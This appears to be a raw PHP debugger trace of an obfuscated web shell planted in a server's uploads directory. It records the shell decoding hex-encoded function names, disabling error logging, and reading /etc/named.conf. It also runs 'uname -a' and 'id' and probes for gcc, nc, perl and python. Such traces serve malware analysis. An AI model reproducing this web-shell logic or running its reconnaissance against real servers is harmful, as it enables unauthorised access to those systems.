2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1303	1	0.048213	585488
2	1303	R			'getmyuid'
1		A						/var/www/html/uploads/index.php	8	$func[65] = 'getmyuid'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1320	0	0.048247	585488	dehex	1		/var/www/html/uploads/index.php	8	1	'6765746d79676964'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 15
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1321	0	0.048294	585520	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	1321	1	0.048306	585568
3	1321	R			103
3	1322	0	0.048318	585488	chr	0		/var/www/html/uploads/index.php	178	1	103
3	1322	1	0.048330	585528
3	1322	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1323	0	0.048361	585552	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1323	1	0.048372	585600
3	1323	R			101
3	1324	0	0.048384	585520	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1324	1	0.048395	585560
3	1324	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1325	0	0.048426	585552	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1325	1	0.048438	585600
3	1325	R			116
3	1326	0	0.048450	585520	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1326	1	0.048461	585560
3	1326	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1327	0	0.048492	585552	hexdec	0		/var/www/html/uploads/index.php	178	1	'6d'
3	1327	1	0.048503	585600
3	1327	R			109
3	1328	0	0.048516	585520	chr	0		/var/www/html/uploads/index.php	178	1	109
3	1328	1	0.048527	585560
3	1328	R			'm'
2		A						/var/www/html/uploads/index.php	178	$r .= 'm'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1329	0	0.048558	585552	hexdec	0		/var/www/html/uploads/index.php	178	1	'79'
3	1329	1	0.048570	585600
3	1329	R			121
3	1330	0	0.048582	585520	chr	0		/var/www/html/uploads/index.php	178	1	121
3	1330	1	0.048594	585560
3	1330	R			'y'
2		A						/var/www/html/uploads/index.php	178	$r .= 'y'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1331	0	0.048624	585552	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	1331	1	0.048636	585600
3	1331	R			103
3	1332	0	0.048648	585520	chr	0		/var/www/html/uploads/index.php	178	1	103
3	1332	1	0.048659	585560
3	1332	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1333	0	0.048689	585552	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1333	1	0.048701	585600
3	1333	R			105
3	1334	0	0.048713	585520	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1334	1	0.048724	585560
3	1334	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1335	0	0.048755	585552	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	1335	1	0.048767	585600
3	1335	R			100
3	1336	0	0.048779	585520	chr	0		/var/www/html/uploads/index.php	178	1	100
3	1336	1	0.048790	585560
3	1336	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1320	1	0.048820	585528
2	1320	R			'getmygid'
1		A						/var/www/html/uploads/index.php	8	$func[66] = 'getmygid'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1337	0	0.048855	585528	dehex	1		/var/www/html/uploads/index.php	8	1	'706f7369785f67657465756964'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 25
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1338	0	0.048899	585560	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	1338	1	0.048911	585608
3	1338	R			112
3	1339	0	0.048924	585528	chr	0		/var/www/html/uploads/index.php	178	1	112
3	1339	1	0.048935	585568
3	1339	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1340	0	0.048966	585592	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	1340	1	0.048982	585640
3	1340	R			111
3	1341	0	0.048994	585560	chr	0		/var/www/html/uploads/index.php	178	1	111
3	1341	1	0.049006	585600
3	1341	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1342	0	0.049043	585592	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1342	1	0.049055	585640
3	1342	R			115
3	1343	0	0.049067	585560	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1343	1	0.049079	585600
3	1343	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1344	0	0.049109	585592	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1344	1	0.049121	585640
3	1344	R			105
3	1345	0	0.049133	585560	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1345	1	0.049144	585600
3	1345	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1346	0	0.049186	585592	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	1346	1	0.049201	585640
3	1346	R			120
3	1347	0	0.049214	585560	chr	0		/var/www/html/uploads/index.php	178	1	120
3	1347	1	0.049225	585600
3	1347	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1348	0	0.049256	585592	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1348	1	0.049268	585640
3	1348	R			95
3	1349	0	0.049280	585560	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1349	1	0.049292	585600
3	1349	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1350	0	0.049322	585592	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	1350	1	0.049334	585640
3	1350	R			103
3	1351	0	0.049346	585560	chr	0		/var/www/html/uploads/index.php	178	1	103
3	1351	1	0.049357	585600
3	1351	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1352	0	0.049388	585592	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1352	1	0.049399	585640
3	1352	R			101
3	1353	0	0.049412	585560	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1353	1	0.049423	585600
3	1353	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1354	0	0.049453	585600	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1354	1	0.049465	585648
3	1354	R			116
3	1355	0	0.049477	585568	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1355	1	0.049488	585608
3	1355	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1356	0	0.049518	585600	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1356	1	0.049529	585648
3	1356	R			101
3	1357	0	0.049542	585568	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1357	1	0.049553	585608
3	1357	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1358	0	0.049583	585600	hexdec	0		/var/www/html/uploads/index.php	178	1	'75'
3	1358	1	0.049594	585648
3	1358	R			117
3	1359	0	0.049606	585568	chr	0		/var/www/html/uploads/index.php	178	1	117
3	1359	1	0.049618	585608
3	1359	R			'u'
2		A						/var/www/html/uploads/index.php	178	$r .= 'u'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1360	0	0.049647	585600	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1360	1	0.049659	585648
3	1360	R			105
3	1361	0	0.049671	585568	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1361	1	0.049682	585608
3	1361	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1362	0	0.049716	585600	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	1362	1	0.049728	585648
3	1362	R			100
3	1363	0	0.049740	585568	chr	0		/var/www/html/uploads/index.php	178	1	100
3	1363	1	0.049752	585608
3	1363	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1337	1	0.049782	585568
2	1337	R			'posix_geteuid'
1		A						/var/www/html/uploads/index.php	8	$func[67] = 'posix_geteuid'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1364	0	0.049817	585568	dehex	1		/var/www/html/uploads/index.php	8	1	'706f7369785f67657465676964'
2		A						/var/www/html/uploads/index.php	175	$r = ''
2		A						/var/www/html/uploads/index.php	176	$len = 25
2		A						/var/www/html/uploads/index.php	177	$i = 0
3	1365	0	0.049858	585600	hexdec	0		/var/www/html/uploads/index.php	178	1	'70'
3	1365	1	0.049870	585648
3	1365	R			112
3	1366	0	0.049883	585568	chr	0		/var/www/html/uploads/index.php	178	1	112
3	1366	1	0.049894	585608
3	1366	R			'p'
2		A						/var/www/html/uploads/index.php	178	$r .= 'p'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1367	0	0.049924	585632	hexdec	0		/var/www/html/uploads/index.php	178	1	'6f'
3	1367	1	0.049936	585680
3	1367	R			111
3	1368	0	0.049949	585600	chr	0		/var/www/html/uploads/index.php	178	1	111
3	1368	1	0.049960	585640
3	1368	R			'o'
2		A						/var/www/html/uploads/index.php	178	$r .= 'o'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1369	0	0.049990	585632	hexdec	0		/var/www/html/uploads/index.php	178	1	'73'
3	1369	1	0.050002	585680
3	1369	R			115
3	1370	0	0.050015	585600	chr	0		/var/www/html/uploads/index.php	178	1	115
3	1370	1	0.050026	585640
3	1370	R			's'
2		A						/var/www/html/uploads/index.php	178	$r .= 's'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1371	0	0.050057	585632	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1371	1	0.050068	585680
3	1371	R			105
3	1372	0	0.050081	585600	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1372	1	0.050092	585640
3	1372	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1373	0	0.050123	585632	hexdec	0		/var/www/html/uploads/index.php	178	1	'78'
3	1373	1	0.050134	585680
3	1373	R			120
3	1374	0	0.050146	585600	chr	0		/var/www/html/uploads/index.php	178	1	120
3	1374	1	0.050158	585640
3	1374	R			'x'
2		A						/var/www/html/uploads/index.php	178	$r .= 'x'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1375	0	0.050188	585632	hexdec	0		/var/www/html/uploads/index.php	178	1	'5f'
3	1375	1	0.050200	585680
3	1375	R			95
3	1376	0	0.050212	585600	chr	0		/var/www/html/uploads/index.php	178	1	95
3	1376	1	0.050224	585640
3	1376	R			'_'
2		A						/var/www/html/uploads/index.php	178	$r .= '_'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1377	0	0.050254	585632	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	1377	1	0.050266	585680
3	1377	R			103
3	1378	0	0.050278	585600	chr	0		/var/www/html/uploads/index.php	178	1	103
3	1378	1	0.050289	585640
3	1378	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1379	0	0.050319	585632	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1379	1	0.050331	585680
3	1379	R			101
3	1380	0	0.050343	585600	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1380	1	0.050355	585640
3	1380	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1381	0	0.050385	585640	hexdec	0		/var/www/html/uploads/index.php	178	1	'74'
3	1381	1	0.050396	585688
3	1381	R			116
3	1382	0	0.050408	585608	chr	0		/var/www/html/uploads/index.php	178	1	116
3	1382	1	0.050419	585648
3	1382	R			't'
2		A						/var/www/html/uploads/index.php	178	$r .= 't'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1383	0	0.050453	585640	hexdec	0		/var/www/html/uploads/index.php	178	1	'65'
3	1383	1	0.050464	585688
3	1383	R			101
3	1384	0	0.050476	585608	chr	0		/var/www/html/uploads/index.php	178	1	101
3	1384	1	0.050487	585648
3	1384	R			'e'
2		A						/var/www/html/uploads/index.php	178	$r .= 'e'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1385	0	0.050517	585640	hexdec	0		/var/www/html/uploads/index.php	178	1	'67'
3	1385	1	0.050528	585688
3	1385	R			103
3	1386	0	0.050541	585608	chr	0		/var/www/html/uploads/index.php	178	1	103
3	1386	1	0.050552	585648
3	1386	R			'g'
2		A						/var/www/html/uploads/index.php	178	$r .= 'g'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1387	0	0.050582	585640	hexdec	0		/var/www/html/uploads/index.php	178	1	'69'
3	1387	1	0.050594	585688
3	1387	R			105
3	1388	0	0.050606	585608	chr	0		/var/www/html/uploads/index.php	178	1	105
3	1388	1	0.050618	585648
3	1388	R			'i'
2		A						/var/www/html/uploads/index.php	178	$r .= 'i'
2		A						/var/www/html/uploads/index.php	177	$i += 2
3	1389	0	0.050648	585640	hexdec	0		/var/www/html/uploads/index.php	178	1	'64'
3	1389	1	0.050660	585688
3	1389	R			100
3	1390	0	0.050672	585608	chr	0		/var/www/html/uploads/index.php	178	1	100
3	1390	1	0.050684	585648
3	1390	R			'd'
2		A						/var/www/html/uploads/index.php	178	$r .= 'd'
2		A						/var/www/html/uploads/index.php	177	$i += 2
2	1364	1	0.050714	585608
2	1364	R			'posix_getegid'
1		A						/var/www/html/uploads/index.php	8	$func[68] = 'posix_getegid'
1		A						/var/www/html/uploads/index.php	7	$i++
2	1391	0	0.050750	585608	session_start	0		/var/www/html/uploads/index.php	11	0
2	1391	1	0.050829	586360
2	1391	R			TRUE
2	1392	0	0.050848	586360	error_reporting	0		/var/www/html/uploads/index.php	12	1	0
2	1392	1	0.050862	586400
2	1392	R			22527
2	1393	0	0.050875	586360	set_time_limit	0		/var/www/html/uploads/index.php	13	1	0
2	1393	1	0.050892	586424
2	1393	R			FALSE
2	1394	0	0.050906	586392	clearstatcache	0		/var/www/html/uploads/index.php	14	0
2	1394	1	0.050919	586392
2	1394	R			NULL
2	1395	0	0.050933	586392	ini_set	0		/var/www/html/uploads/index.php	15	2	'error_log'	NULL
2	1395	1	0.050948	586464
2	1395	R			''
2	1396	0	0.050961	586392	ini_set	0		/var/www/html/uploads/index.php	16	2	'log_errors'	0
2	1396	1	0.050975	586464
2	1396	R			'1'
2	1397	0	0.050988	586392	ini_set	0		/var/www/html/uploads/index.php	17	2	'max_execution_time'	0
2	1397	1	0.051002	586432
2	1397	R			'0'
2	1398	0	0.051015	586360	ini_set	0		/var/www/html/uploads/index.php	18	2	'output_buffering'	0
2	1398	1	0.051028	586432
2	1398	R			FALSE
2	1399	0	0.051042	586360	ini_set	0		/var/www/html/uploads/index.php	19	2	'display_errors'	0
2	1399	1	0.051055	586432
2	1399	R			''
2	1400	0	0.051068	586360	date_default_timezone_set	0		/var/www/html/uploads/index.php	20	1	'Asia/Jakarta'
2	1400	1	0.051084	586424
2	1400	R			TRUE
2	1401	0	0.051099	586376	getcwd	0		/var/www/html/uploads/index.php	26	0
2	1401	1	0.051113	586424
2	1401	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/index.php	26	$dir = '/var/www/html/uploads'
2	1402	0	0.051139	586424	file	0		/var/www/html/uploads/index.php	29	2	'/etc/named.conf'	FALSE
2	1402	1	0.051170	586608
2	1402	R			FALSE
1		A						/var/www/html/uploads/index.php	29	$d0mains = FALSE
1		A						/var/www/html/uploads/index.php	31	$dom = '<font class=\'text-danger\'>Can\'t Read /etc/named.conf</font>'
2	1403	0	0.051210	586536	str_replace	0		/var/www/html/uploads/index.php	47	3	'\\'	'/'	'/var/www/html/uploads'
2	1403	1	0.051226	586632
2	1403	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/index.php	47	$dir = '/var/www/html/uploads'
2	1404	0	0.051252	586536	explode	0		/var/www/html/uploads/index.php	48	2	'/'	'/var/www/html/uploads'
2	1404	1	0.051266	587112
2	1404	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/index.php	48	$scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2	1405	0	0.051305	587040	disk_total_space	0		/var/www/html/uploads/index.php	49	1	'/var/www/html/uploads'
2	1405	1	0.051322	587072
2	1405	R			232015802368
1		A						/var/www/html/uploads/index.php	49	$total = 232015802368
2	1406	0	0.051348	587040	disk_free_space	0		/var/www/html/uploads/index.php	50	1	'/var/www/html/uploads'
2	1406	1	0.051363	587072
2	1406	R			195440615424
1		A						/var/www/html/uploads/index.php	50	$free = 195440615424
1		A						/var/www/html/uploads/index.php	51	$pers = 84
2	1407	0	0.051400	587040	ini_get	0		/var/www/html/uploads/index.php	52	1	'disable_functions'
2	1407	1	0.051414	587520
2	1407	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/index.php	52	$ds = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/index.php	53	$show_ds = '<font class=\'text-danger\'>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font>'
2	1408	0	0.051482	587936	exe	1		/var/www/html/uploads/index.php	55	1	'uname -a'
2		A						/var/www/html/uploads/index.php	229	$out = ''
3	1409	0	0.051506	587960	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
3	1409	1	0.051519	588000
3	1409	R			TRUE
3	1410	0	0.051533	587984	exec	0		/var/www/html/uploads/index.php	232	2	'uname -a'	''
3	1410	1	0.052817	588744
3	1410	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
3	1411	0	0.052850	588520	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux']
3	1411	1	0.052872	588584
3	1411	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2		A						/var/www/html/uploads/index.php	233	$out = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2	1408	1	0.052911	588120
2	1408	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
1		A						/var/www/html/uploads/index.php	55	$cmd_uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2	1412	0	0.052947	588120	function_exists	0		/var/www/html/uploads/index.php	56	1	'php_uname'
2	1412	1	0.052962	588160
2	1412	R			TRUE
2	1413	0	0.052976	588120	php_uname	0		/var/www/html/uploads/index.php	56	0
2	1413	1	0.052989	588232
2	1413	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	1414	0	0.053008	588232	substr	0		/var/www/html/uploads/index.php	56	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
2	1414	1	0.053027	588328
2	1414	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/index.php	56	$uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	1415	0	0.053068	588232	substr	0		/var/www/html/uploads/index.php	58	3	'Linux'	0	3
2	1415	1	0.053082	588360
2	1415	R			'Lin'
2	1416	0	0.053095	588264	strtolower	0		/var/www/html/uploads/index.php	58	1	'Lin'
2	1416	1	0.053108	588328
2	1416	R			'lin'
1		A						/var/www/html/uploads/index.php	61	$sys = 'unix'
1		A						/var/www/html/uploads/index.php	87	$do = 'filesman'
1		A						/var/www/html/uploads/index.php	88	$title = 'Files Manager'
1		A						/var/www/html/uploads/index.php	89	$icon = 'archive'
2	1417	0	0.053166	588232	ini_get	0		/var/www/html/uploads/index.php	111	1	'open_basedir'
2	1417	1	0.053200	588264
2	1417	R			''
1		A						/var/www/html/uploads/index.php	119	$open_b = '<font class="text-warning">NONE</font>'
2	1418	0	0.053233	588232	function_exists	0		/var/www/html/uploads/index.php	122	1	'posix_getegid'
2	1418	1	0.053247	588272
2	1418	R			TRUE
2	1419	0	0.053260	588232	function_exists	0		/var/www/html/uploads/index.php	128	1	'posix_getpwuid'
2	1419	1	0.053273	588272
2	1419	R			TRUE
2	1420	0	0.053285	588232	function_exists	0		/var/www/html/uploads/index.php	128	1	'posix_geteuid'
2	1420	1	0.053298	588272
2	1420	R			TRUE
2	1421	0	0.053311	588232	posix_geteuid	0		/var/www/html/uploads/index.php	128	0
2	1421	1	0.053324	588232
2	1421	R			33
2	1422	0	0.053336	588232	posix_getpwuid	0		/var/www/html/uploads/index.php	128	1	33
2	1422	1	0.053371	589064
2	1422	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1		A						/var/www/html/uploads/index.php	128	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
2	1423	0	0.053416	589032	function_exists	0		/var/www/html/uploads/index.php	129	1	'posix_getgrgid'
2	1423	1	0.053429	589072
2	1423	R			TRUE
2	1424	0	0.053442	589032	function_exists	0		/var/www/html/uploads/index.php	129	1	'posix_getegid'
2	1424	1	0.053455	589072
2	1424	R			TRUE
2	1425	0	0.053468	589032	posix_getegid	0		/var/www/html/uploads/index.php	129	0
2	1425	1	0.053480	589032
2	1425	R			33
2	1426	0	0.053492	589032	posix_getgrgid	0		/var/www/html/uploads/index.php	129	1	33
2	1426	1	0.053518	589696
2	1426	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/index.php	129	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/index.php	130	$user = 'www-data'
1		A						/var/www/html/uploads/index.php	131	$uid = 33
1		A						/var/www/html/uploads/index.php	132	$group = 'www-data'
1		A						/var/www/html/uploads/index.php	133	$gid = 33
2	1427	0	0.053595	588312	ini_get	0		/var/www/html/uploads/index.php	137	1	'safe_mode'
2	1427	1	0.053608	588344
2	1427	R			FALSE
2	1428	0	0.053621	588312	exe	1		/var/www/html/uploads/index.php	138	1	'id'
2		A						/var/www/html/uploads/index.php	229	$out = ''
3	1429	0	0.053644	588312	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
3	1429	1	0.053656	588352
3	1429	R			TRUE
3	1430	0	0.053669	588336	exec	0		/var/www/html/uploads/index.php	232	2	'id'	''
3	1430	1	0.055092	588936
3	1430	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3	1431	0	0.055118	588792	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
3	1431	1	0.055136	588856
3	1431	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2		A						/var/www/html/uploads/index.php	233	$out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1428	1	0.055166	588392
2	1428	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1432	0	0.055182	588392	strlen	0		/var/www/html/uploads/index.php	138	1	'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1432	1	0.055197	588424
2	1432	R			53
1		A						/var/www/html/uploads/index.php	139	$userful = [0 => 'gcc', 1 => 'lcc', 2 => 'cc', 3 => 'ld', 4 => 'make', 5 => 'php', 6 => 'perl', 7 => 'python', 8 => 'ruby', 9 => 'tar', 10 => 'gzip', 11 => 'bzip', 12 => 'bzialfa2', 13 => 'nc', 14 => 'locate', 15 => 'suidperl']
1		A						/var/www/html/uploads/index.php	140	$x = 0
2	1433	0	0.055247	588312	which	1		/var/www/html/uploads/index.php	142	1	'gcc'
3	1434	0	0.055261	588352	exe	1		/var/www/html/uploads/index.php	336	1	'which gcc'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1435	0	0.055285	588352	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1435	1	0.055298	588392
4	1435	R			TRUE
4	1436	0	0.055311	588376	exec	0		/var/www/html/uploads/index.php	232	2	'which gcc'	''
4	1436	1	0.056553	588896
4	1436	R			'/usr/bin/gcc'
4	1437	0	0.056577	588792	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/gcc']
4	1437	1	0.056595	588856
4	1437	R			'/usr/bin/gcc'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/gcc'
3	1434	1	0.056622	588392
3	1434	R			'/usr/bin/gcc'
2		A						/var/www/html/uploads/index.php	336	$path = '/usr/bin/gcc'
3	1438	0	0.056655	588352	strlen	0		/var/www/html/uploads/index.php	338	1	'/usr/bin/gcc'
3	1438	1	0.056668	588384
3	1438	R			12
2	1433	1	0.056681	588312
2	1433	R			12
1		A						/var/www/html/uploads/index.php	143	$x++
1		A						/var/www/html/uploads/index.php	144	$useful .= 'gcc, '
2	1439	0	0.056717	588344	which	1		/var/www/html/uploads/index.php	142	1	'lcc'
3	1440	0	0.056731	588384	exe	1		/var/www/html/uploads/index.php	336	1	'which lcc'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1441	0	0.056754	588384	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1441	1	0.056767	588424
4	1441	R			TRUE
4	1442	0	0.056780	588408	exec	0		/var/www/html/uploads/index.php	232	2	'which lcc'	''
4	1442	1	0.058018	588528
4	1442	R			''
4	1443	0	0.058041	588464	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[]
4	1443	1	0.058056	588528
4	1443	R			''
3		A						/var/www/html/uploads/index.php	233	$out = ''
3	1440	1	0.058081	588384
3	1440	R			''
2		A						/var/www/html/uploads/index.php	336	$path = ''
2	1439	1	0.058105	588344
2	1439	R			FALSE
2	1444	0	0.058119	588344	which	1		/var/www/html/uploads/index.php	142	1	'cc'
3	1445	0	0.058133	588384	exe	1		/var/www/html/uploads/index.php	336	1	'which cc'
3		A						/var/www/html/uploads/index.php	229	$out = ''
4	1446	0	0.058157	588384	function_exists	0		/var/www/html/uploads/index.php	231	1	'exec'
4	1446	1	0.058171	588424
4	1446	R			TRUE
4	1447	0	0.058184	588408	exec	0		/var/www/html/uploads/index.php	232	2	'which cc'	''
4	1447	1	0.059339	588928
4	1447	R			'/usr/bin/cc'
4	1448	0	0.059362	588824	join	0		/var/www/html/uploads/index.php	233	2	'\n'	[0 => '/usr/bin/cc']
4	1448	1	0.059379	588888
4	1448	R			'/usr/bin/cc'
3		A						/var/www/html/uploads/index.php	233	$out = '/usr/bin/cc'
3	1445	1	0.059406	588424
3	1445	R			'/usr/bin/cc'
